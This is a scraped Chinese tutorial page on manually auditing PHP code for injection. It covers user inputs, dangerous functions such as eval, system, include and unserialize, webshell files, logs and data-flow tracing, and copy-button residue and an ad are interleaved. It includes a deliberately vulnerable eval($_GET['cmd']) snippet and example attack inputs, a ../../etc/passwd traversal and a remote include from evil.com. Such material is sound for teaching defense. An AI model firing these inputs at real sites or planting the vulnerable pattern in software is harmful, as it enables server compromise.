PHP代码注入检测手动方法_PHP代码注入手动检测步骤详解-php教程-PHP中文网

手动检测PHP代码注入需从输入源、危险函数、数据流和日志入手，通过审查用户输入是否被未经净化地传递给eval()、system()、include()等高风险函数，追踪数据流向，分析日志异常，并结合业务逻辑判断漏洞存在。

php代码注入检测手动方法_php代码注入手动检测步骤详解

手动检测PHP代码注入，本质上就是扮演一个“侦探”的角色，通过细致入微的观察和逻辑推理，从代码、系统行为和日志中找出那些不该出现的、由外部输入控制的执行路径或数据。它不像自动化工具那样依赖预设规则，更多的是依赖经验、直觉以及对系统运作机制的深刻理解，去捕捉那些“不对劲”的蛛丝马迹。

解决方案

要手动检测PHP代码注入，我们需要从几个关键维度入手，这通常是一个迭代且需要耐心的过程：

审查输入源：
- 全局变量检查：
```
$ _GET
```
  登录后复制
  、
```
$ _POST
```
  登录后复制
  、
```
$ _REQUEST
```
  登录后复制
  、
```
$ _COOKIE
```
  登录后复制
  、
```
$ _SERVER
```
  登录后复制
  甚至
```
$ _FILES
```
  登录后复制
  ，任何来自用户或外部环境的数据都可能是潜在的攻击入口。我们需要追踪这些数据在代码中的流向。
- 数据净化与验证： 检查代码中是否有对这些输入的严格过滤、转义或类型转换。例如，如果一个参数预期是整数，但代码没有强制转换，那么字符串形式的恶意输入就可能被执行。
- 白名单机制： 理想情况下，应该使用白名单来限制允许的输入值或格式，而不是黑名单。
定位危险函数的使用：

立即学习“PHP免费学习笔记（深入）”；
- 代码执行函数：
```
eval()
```
  登录后复制
  、
```
system()
```
  登录后复制
  、
```
exec()
```
  登录后复制
  、
```
passthru()
```
  登录后复制
  、
```
shell_exec()
```
  登录后复制
  、`` (反引号操作符) 等。这些函数直接执行字符串作为代码或系统命令，是代码注入和命令注入的重灾区。
- 文件操作函数：
```
include()
```
  登录后复制
  、
```
require()
```
  登录后复制
  、
```
include_once()
```
  登录后复制
  、
```
require_once()
```
  登录后复制
  。当这些函数的参数可控时，可能导致本地文件包含（LFI）或远程文件包含（RFI），进而执行任意代码。
```
file_get_contents()
```
  登录后复制
  、
```
file_put_contents()
```
  登录后复制
  等也需警惕，它们可能被用于读取敏感文件或写入webshell。
- 变量函数与回调函数： PHP允许使用变量作为函数名调用，如
```
$func_name($arg)
```
  登录后复制
  ，或者在
```
call_user_func()
```
  登录后复制
  、
```
array_map()
```
  登录后复制
  等函数中使用用户可控的回调函数。
- 反序列化：
```
unserialize()
```
  登录后复制
  函数在处理不可信的用户输入时，可能导致PHP对象注入，进而触发魔术方法（如
```
__destruct()
```
  登录后复制
  ）中的危险操作。
检查文件系统异常：
- 未知文件： 留意Web服务器目录下是否存在不属于项目、创建时间异常、内容可疑的PHP文件（如
```
shell.php
```
  登录后复制
  、
```
cmd.php
```
  登录后复制
  或一些乱码文件名）。这些往往是攻击者成功注入后上传的webshell。
- 文件权限： 检查关键文件和目录的权限设置，看是否有不恰当的可写权限，这可能被攻击者利用来上传或修改文件。
分析错误日志和访问日志：
- PHP错误日志： 仔细查看PHP的错误日志，寻找
```
eval()
```
  登录后复制
  、
```
include()
```
  登录后复制
  等函数在非预期参数下产生的警告或错误，这可能是攻击尝试的痕迹。
- Web服务器访问日志： 检查HTTP请求中是否存在异常参数、编码、请求路径或请求方法，特别是那些包含特殊字符（如
```
../
```
  登录后复制
  、
```
;
```
  登录后复制
  、
```
|
```
  登录后复制
  、
```
&
```
  登录后复制
  ）或看起来像命令的字符串。
追踪数据流：
- 从输入点（
```
$_GET
```
  登录后复制
  、
```
$_POST
```
  登录后复制
  等）开始，一步步追踪数据在代码中的传递，看它是否在某个环节被拼接成代码、命令或文件路径，并最终被危险函数执行。这需要对代码结构有较好的理解。

为什么手动检测仍然有其不可替代的价值？

说实话，我个人觉得，尽管现在自动化工具五花八门，但手动检测PHP代码注入的价值，就好比老中医看病，它有那种自动化工具难以企及的“望闻问切”的灵活性和深度。自动化工具再智能，也只是基于既定规则和模式去扫描。它可能会发现那些“教科书式”的漏洞，但对于一些业务逻辑层面的、或者需要结合上下文才能判断的“零日”或“半零日”漏洞，自动化工具往往束手无策。

举个例子，一个业务流程中，某个参数在A函数里经过了严格过滤，但在B函数里，这个参数又被重新组合，并且在没有再次过滤的情况下被传递给一个危险函数。自动化工具可能只看到A函数的过滤，就觉得“安全”了。但人就不一样，我们能理解整个业务流，能跳出局部，从全局去思考数据是如何从不可信的源头流向危险的“水槽”的。这种对业务逻辑的理解、对代码意图的洞察，是目前任何AI或扫描器都无法完全取代的。再者，很多时候，一些巧妙的混淆和编码也能轻松绕过自动化工具的检测，这时候，只有人才能通过逆向思维和经验去揭示其真面目。

哪些PHP函数是代码注入的“重灾区”？

在PHP的世界里，有些函数就像是双刃剑，强大但极易被滥用，从而成为代码注入的“重灾区”。我个人在代码审计时，看到这些函数，总会条件反射地多看几眼。

首当其冲的当然是

eval()

登录后复制

。这个函数能把字符串当作PHP代码来执行，简直是给攻击者开了一扇直达服务器的大门。如果

eval()

登录后复制

的参数能被用户控制，那基本上就等于服务器的控制权拱手让人了。

代码小浣熊

代码小浣熊是基于商汤大语言模型的软件智能研发助手，覆盖软件需求分析、架构设计、代码编写、软件测试等环节

查看详情

// 这是一个非常危险的例子，切勿在生产环境使用！
$code = $_GET['cmd']; // 假设用户输入：phpinfo();
eval($code); // 攻击者可以直接执行任意PHP代码

登录后复制

紧随其后的是一系列系统命令执行函数：

system()

登录后复制

、

exec()

登录后复制

、

passthru()

登录后复制

、

shell_exec()

登录后复制

以及反引号操作符

登录后复制

。这些函数允许PHP执行操作系统的命令。如果用户输入被直接拼接到这些函数的参数中，攻击者就可以执行任意的系统命令，比如查看文件、删除文件甚至反弹shell。

include()

登录后复制

和

require()

登录后复制

系列函数也极其危险。当它们的参数可控时，攻击者可以通过文件包含漏洞（LFI/RFI）来加载并执行服务器上的任意文件，甚至远程服务器上的恶意文件。例如，如果

include($_GET['page'] . '.php');

登录后复制

，攻击者可能通过

?page=../../../../etc/passwd

登录后复制

来读取敏感文件，或者通过

?page=http://evil.com/shell

登录后复制

来执行远程代码。

unserialize()

登录后复制

函数也值得高度关注。它用于反序列化一个字符串，将其恢复为PHP值。如果这个字符串来自不可信的源，并且包含恶意构造的对象，那么在反序列化过程中，对象的魔术方法（如

__destruct()

登录后复制

、

__wakeup()

登录后复制

等）可能会被触发，从而导致任意代码执行、文件操作或其他危险行为，这就是所谓的PHP对象注入。

还有一些不那么显眼但同样危险的：

create_function()
登录后复制
：虽然在PHP 7.2中已被弃用，但在老代码中依然存在，它允许动态创建匿名函数，其内部代码同样可能被注入。
preg_replace()
登录后复制
配合
```
/e
```
登录后复制
修饰符：在旧版PHP中，
```
/e
```
登录后复制
修饰符会将替换字符串当作PHP代码执行，这也是一个经典的注入点。
变量函数：
```
$func_name($arg)
```
登录后复制
这种形式，如果
```
$func_name
```
登录后复制
变量被用户控制，攻击者就可以调用任意PHP函数。